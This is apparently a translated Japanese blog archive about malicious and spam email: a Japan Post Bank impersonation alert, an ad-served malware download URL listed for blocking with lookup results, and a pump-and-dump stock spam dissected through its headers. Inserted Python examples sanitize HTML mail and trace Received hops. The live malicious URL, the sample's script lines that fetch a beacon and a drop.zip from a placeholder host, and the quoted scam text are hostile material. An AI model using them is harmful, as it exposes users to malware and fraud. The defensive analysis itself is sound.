Tag archive: "Virus"

So they say: watch out for suspicious emails impersonating Japan Post Bank (ゆうちょ銀行) and internet banking

So they say: a virus mail impersonating Japan Post Bank is spreading

Emails that get you to download a virus are spreading.
The subject is 『ゆうちょ銀行 入金のご連絡 (N71019788477G)』 (Japan Post Bank: notice of a deposit).
They pose as a real company, but the file downloaded by clicking the link in the body is a virus. Please be careful.
That is what the alert says.

The mail was sent on November 20 with the subject 「ゆうちょ銀行入金のご連絡(N71019788477G)」. It poses as a deposit notification from Japan Post Bank; clicking the link it contains leads to a site that downloads a ZIP file carrying the virus.
Virus mail impersonating Japan Post Bank (from the JC3 alert page)


Details
https://www.jc3.or.jp/topics/virusmail.html

http://www.jp-bank.japanpost.jp/crime/crm_email.html

Close displays like this, because they put a virus onto the actual machine!

It happened to come up inside an ad, so I was finally able to capture it.
This is it.
The site is here:
http://b.csmfnkmubuddy.download/111446/1530/k3p/l0ar6wc

It is served through a proxy, so probably via DDNS.
Blocking it from here on might prevent it a little:
csmfnkmubuddy.download
Lookup for csmfnkmubuddy.download (output of the web lookup tool used in the post; the tool's prompts and "next check" timers are stripped):
Domain IP address: 178.175.130.163
Proxy server IP: the address is flagged as a proxy in the GeoIP record
Internet service provider: I.C.S. Trabia-Network S.R.L.
Organization: trabia network
Country ISO alpha-2 code: anonymous proxy
State: Municipiul Chisinau
City: Chisinau
Timezone: Europe/Chisinau
Longitude: 28.8575
Latitude: 47.0056
WHOIS: new WHOIS data was unavailable at lookup time
Forward DNS primary host: eforward4.registrar-servers.com
Forward DNS expanded data:
csmfnkmubuddy.download has address 178.175.130.163
csmfnkmubuddy.download mail is handled by 10 eforward1.registrar-servers.com.
csmfnkmubuddy.download mail is handled by 10 eforward2.registrar-servers.com.
csmfnkmubuddy.download mail is handled by 10 eforward3.registrar-servers.com.
csmfnkmubuddy.download mail is handled by 20 eforward5.registrar-servers.com.
csmfnkmubuddy.download mail is handled by 15 eforward4.registrar-servers.com.
Forward DNS last updated: August 11, 2017, 9:57 pm GMT
Reverse DNS in-addr.arpa: no valid reverse DNS record found at this time
Reverse DNS last updated: August 11, 2017, 9:57 pm GMT

Subject: In less than 5 days this company could yield you a ten bagger is spam.

This is spam sent with PHPMailer.
There really is a lot of it. You are better off not using a mailer like Outlook that accepts HTML mail.
To keep viruses out, the options are receiving in plain text or receiving with the scripts wiped out of the HTML.
On my side scripts are forcibly stripped server-side, so nothing gets in, which is fine.
Naturally the layout of the mail breaks, but really, I don't understand the policy behind sending mail like that.
Most malware is tied up with this kind of rich text, idiots.
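Added example (not from the post): the two options named above, keeping only the text/plain alternative or stripping scripts out of the HTML part before delivery, written in Python against a constructed multipart/alternative message. The sample mail, its example.invalid hostnames and the b1_demo boundary are made up for this demonstration; the regex filter is deliberately coarse and stands in for, not replaces, a real HTML sanitizer.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed sample (not a real capture): a multipart/alternative mail whose
# HTML part carries a <script>, an inline event handler and a javascript: link.
SAMPLE_MAIL = """\
From: "Mallory Hill" <sender@example.invalid>
To: victim@example.invalid
Subject: In less than 5 days this company could yield you a ten bagger
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1_demo"

--b1_demo
Content-Type: text/plain; charset=UTF-8

Good morning!

--b1_demo
Content-Type: text/html; charset=UTF-8

<html><body onload="fetch('http://example.invalid/beacon')">
<p>Good morning!</p>
<script>document.location='http://example.invalid/drop.zip'</script>
<a href="javascript:alert(1)">Get in fast</a>
</body></html>
--b1_demo--
"""

# Coarse filters: <script>...</script> blocks, on* attributes, javascript: URLs.
SCRIPT_RE = re.compile(r"<script\b.*?</script\s*>", re.I | re.S)
EVENT_ATTR_RE = re.compile(r"""\s+on\w+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)""", re.I)
JS_URL_RE = re.compile(r"""(href|src)\s*=\s*(["']?)\s*javascript:[^"'>\s]*\2""", re.I)


def sanitize_html(html: str) -> str:
    """Drop script blocks and event handlers; neuter javascript: links to '#'."""
    html = SCRIPT_RE.sub("", html)
    html = EVENT_ATTR_RE.sub("", html)
    html = JS_URL_RE.sub(r"\1=\2#\2", html)
    return html


def plain_text_only(raw: str) -> str:
    """Option 1 from the post: hand the mailer only the text/plain alternative."""
    msg = email.message_from_string(raw, policy=policy.default)
    part = msg.get_body(preferencelist=("plain",))
    return part.get_content() if part is not None else ""


def strip_scripts_from_message(raw: str) -> EmailMessage:
    """Option 2 from the post: keep the HTML part but rewrite it with sanitize_html()."""
    msg = email.message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            # set_content() replaces the payload and its Content-* headers in place.
            part.set_content(sanitize_html(part.get_content()), subtype="html")
    return msg


if __name__ == "__main__":
    print("plain-text view:", plain_text_only(SAMPLE_MAIL).strip())
    cleaned = strip_scripts_from_message(SAMPLE_MAIL)
    print(cleaned.get_body(preferencelist=("html",)).get_content())
```

Either function slots into a delivery hook (a Postfix content filter or a procmail/sieve stage) ahead of the user's mailbox; the plain-text route loses layout, as the post notes, while the sanitize route keeps it at the cost of trusting the filter's coverage.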

Subject
Subject: In less than 5 days this company could yield you a ten bagger
From
“Mallory Hill”
Reply-To

To
(my own address)
Body

Good morning!
I’ve been involved in the markets for a few decades now and I’ll be the first to tell you that things have never been as uncertain as they are today.
With a new administration heading our country, it’s becoming increasingly difficult to get the edge in the markets.
At least, we can always count on lady luck to come in handy when we need her.
A friend of mine founded a small medical company a few years ago and he has been researching a novel way of using the immune system to kill tumors.
After extensive tests and lengthy approval processes, he finally got the green light on this life changing new therapy.
Because of that, a big pharma has put in an offer to buy out the entire company. At essentially 10 times the current trading value.
This guarantees that if you get shares today at under 20 cents each, you will cash out ten times that amount by Friday.
The ticker which you need to use to buy is the first letter of each of these words:
Quest, Start, Mega, Great
Together they make up the 4 letter symbol which you need. Get in as fast as you can before the price jumps.

Attachments
None
———————————————
Source
From – Tue Jun 20 08:1 2017
X-Account-Key:
X-UIDL:
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path:
X-Original-To: @
Delivered-To: @
Received: from net-2-38-28-138.cust.vodafonedsl.it (net-2-38-28-138.cust.vodafonedsl.it [2.38.28.138])
by mail. (Postfix) with ESMTP id D97F834CA1B6
for <@>; Mon, 19 Jun 2017 19: +0900 (JST)
Received: (from apache@localhost)
by recoveryflash.net (8.14.7/8.14.7/Submit) id ;
Mon, 19 Jun 2017 12: +0200
Date: Mon, 19 Jun 2017 12: +0200
To: @
From: “Mallory Hill”
Subject: In less than 5 days this company could yield you a ten bagger
Message-ID: <@recoveryflash.net>
X-Priority: 3
X-Mailer: PHPMailer 5.2.8 (https://github.com/PHPMailer/PHPMailer/)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=”b1_”
Content-Transfer-Encoding: 8bit
X-EsetId:

–b1_
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Good morning!

I’ve been involved in the markets for a few decades now and I’ll be the first to tell you that things have never been as uncertain as they are today.

With a new administration heading our country, it’s becoming increasingly difficult to get the edge in the markets.

At least, we can always count on lady luck to come in handy when we need her.

———————————————
No attachment
———————————————
Lookup for the delivering address 2.38.28.138, the host in the outer Received header (web lookup tool output; the tool's prompts and "next check" timers are stripped):
IPv4 address: 2.38.28.138
IPv4 expanded: 002.038.028.138
IPv4 decimal: 36052106
Internet service provider: Vodafone Italia DSL
Organization: Vodafone Italia DSL
Country: Italy (IT)
State: The Marches
City: Colbuccaro
Timezone: Europe/Rome
Longitude: 13.4436
Latitude: 43.2446
WHOIS: request limit reached at lookup time
Reverse DNS host: vodafonedsl.it
Reverse DNS pointer: net-2-38-28-138.cust.vodafonedsl.it
Reverse DNS in-addr.arpa: 138.28.38.2.in-addr.arpa domain name pointer net-2-38-28-138.cust.vodafonedsl.it.
Reverse DNS last updated: June 20, 2017, 12:38 am GMT
Bot/spider: No
———————————————
Domain name: recoveryflash.net, the host named in the inner "(from apache@localhost) by ..." Received header (web lookup tool output; the tool's prompts and ranking widgets are stripped)
Page response: 39.76 ms
Meta tags: the title is a Shift_JIS string mis-encoded by the tool; its readable tail appears to decode to ［2017年0602 更新］, an "updated 2017-06-02" stamp. Viewport: width=device-width, initial-scale=1
Internet service provider: K-Opticom Corporation
Organization: K-Opticom Corporation
Country: Japan (JP)
State: Nara
City: Nara
Timezone: Asia/Tokyo
Longitude: 135.8328
Latitude: 34.6853
WHOIS: request limit reached at lookup time
Forward DNS primary host: recoveryflash.net
Forward DNS expanded data:
recoveryflash.net has address 59.190.130.26
recoveryflash.net mail is handled by 0 recoveryflash.net.
Forward DNS last updated: June 20, 2017, 12:27 am GMT
Reverse DNS host: pending reverse DNS update
———————————————
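Added example (not from the post): the Received-chain check behind reading the headers above, in Python. The header block is copied from the post's own mail source, keeping its redactions ("mail.", "<@>") and truncated timestamps exactly as printed; KNOWN_A holds the A record the post's lookup returned for recoveryflash.net, hard-coded so the script runs offline instead of resolving the name. The point it makes explicit: only the top Received line was written by the receiving MTA, and its bracketed address (a Vodafone Italia DSL customer) does not match the Japanese address the inner hop's hostname resolves to, so the "by recoveryflash.net" line is the sender's claim, not a corroborated fact.

```python
import re
from email import message_from_string

# Copied from the post's mail source; the post's own redactions and truncated
# times are kept as they appear there.
RAW_HEADERS = """\
Received: from net-2-38-28-138.cust.vodafonedsl.it (net-2-38-28-138.cust.vodafonedsl.it [2.38.28.138])
    by mail. (Postfix) with ESMTP id D97F834CA1B6
    for <@>; Mon, 19 Jun 2017 19: +0900 (JST)
Received: (from apache@localhost)
    by recoveryflash.net (8.14.7/8.14.7/Submit) id ;
    Mon, 19 Jun 2017 12: +0200
Date: Mon, 19 Jun 2017 12: +0200
From: "Mallory Hill"
Subject: In less than 5 days this company could yield you a ten bagger
X-Priority: 3
X-Mailer: PHPMailer 5.2.8 (https://github.com/PHPMailer/PHPMailer/)
MIME-Version: 1.0

"""

# A record the post's lookup tool returned for recoveryflash.net, hard-coded so
# the check runs offline (a live version would resolve the name here).
KNOWN_A = {"recoveryflash.net": "59.190.130.26"}

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")   # address the receiving host saw
FROM_RE = re.compile(r"^from\s+(\S+)")                  # HELO/EHLO name the sender gave
BY_RE = re.compile(r"\bby\s+(\S+)")                     # host that wrote the line
LOCAL_RE = re.compile(r"^\(from\s+([^)\s]+)\)")         # sendmail "(from user@localhost)"


def parse_received(raw: str) -> list:
    """Return the Received hops top-down: index 0 is the newest, written by the receiving MTA."""
    msg = message_from_string(raw)
    hops = []
    for value in msg.get_all("Received", []):
        value = re.sub(r"\s+", " ", value).strip()   # unfold continuation lines
        ip, frm, by, local = (IP_RE.search(value), FROM_RE.match(value),
                              BY_RE.search(value), LOCAL_RE.match(value))
        hops.append({
            "from": frm.group(1) if frm else None,
            "ip": ip.group(1) if ip else None,
            "by": by.group(1) if by else None,
            "local_user": local.group(1) if local else None,
        })
    return hops


def assess(raw: str, known_a: dict) -> tuple:
    """Compare the hop our MTA recorded with what the sender claims about itself."""
    hops = parse_received(raw)
    if not hops:
        return None, None, []
    msg = message_from_string(raw)
    findings = []
    # Only the topmost hop was written on our side; its bracketed address is the
    # one fact in the chain the sender could not have forged.
    delivering = next((h["ip"] for h in hops if h["ip"]), None)
    origin = hops[-1]                     # earliest hop: what the sender says about itself
    mailer = msg.get("X-Mailer", "")
    if origin["local_user"]:
        findings.append(f"local-submission: {origin['local_user']} on {origin['by']}")
    if mailer.startswith("PHPMailer"):
        findings.append(f"web-app-mailer: {mailer.split(' (')[0]}")
    claimed = known_a.get(origin["by"] or "")
    if claimed and delivering and claimed != delivering:
        findings.append(f"hop-mismatch: {origin['by']} is {claimed} but mail came from {delivering}")
    return delivering, origin, findings


if __name__ == "__main__":
    ip, origin, findings = assess(RAW_HEADERS, KNOWN_A)
    print("delivered to us by", ip)
    for finding in findings:
        print(" -", finding)
```

A local submission by the apache user plus a PHPMailer X-Mailer is the signature of a web application sending mail, which is what the post means by "spam sent with PHPMailer"; whether that application is the spammer's own or a compromised site is not something the headers alone settle.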